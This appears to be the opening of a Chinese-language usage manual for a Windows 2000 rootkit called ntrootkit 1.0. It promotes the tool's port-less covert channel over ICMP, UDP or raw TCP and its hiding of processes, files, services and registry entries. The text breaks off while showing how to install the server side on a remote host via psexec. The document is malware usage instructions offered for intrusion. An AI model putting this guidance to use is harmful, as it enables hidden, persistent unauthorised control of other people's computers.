yyt_hac's ntrootkit 1.0 使用說明

一、簡介
   本ntrootkit采用無連接協議，不開端口，有四種協議可以選擇(0:userdefined,1:icmp,2:udp,3:tcp)，注意第三種
方式，它只是使用了tcp數據包進行通訊，并沒有建立tcp連接，用這種方式只要把目標端口設置成任意一個目標機器上
開的端口，一般都會成功的機會很大。它隱藏進程，文件，目錄，服務，注冊表項，提供一些很有用的命令。
二、使用環境
   Windows 2000系列操作系統（包括客戶端和服務器端）
三、使用步驟
說明：
下面是我在命令行下的使用結果，只要使用過命令行工具的人應該都可以看懂，/*.....*/之間的部分是我加的注釋。

1、安裝服務器端

F:\letmein>psexec \\202.39.*.* cmd.exe  /* 用psexec登錄遠程機器 */

PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com


Microsoft Windows 2000 [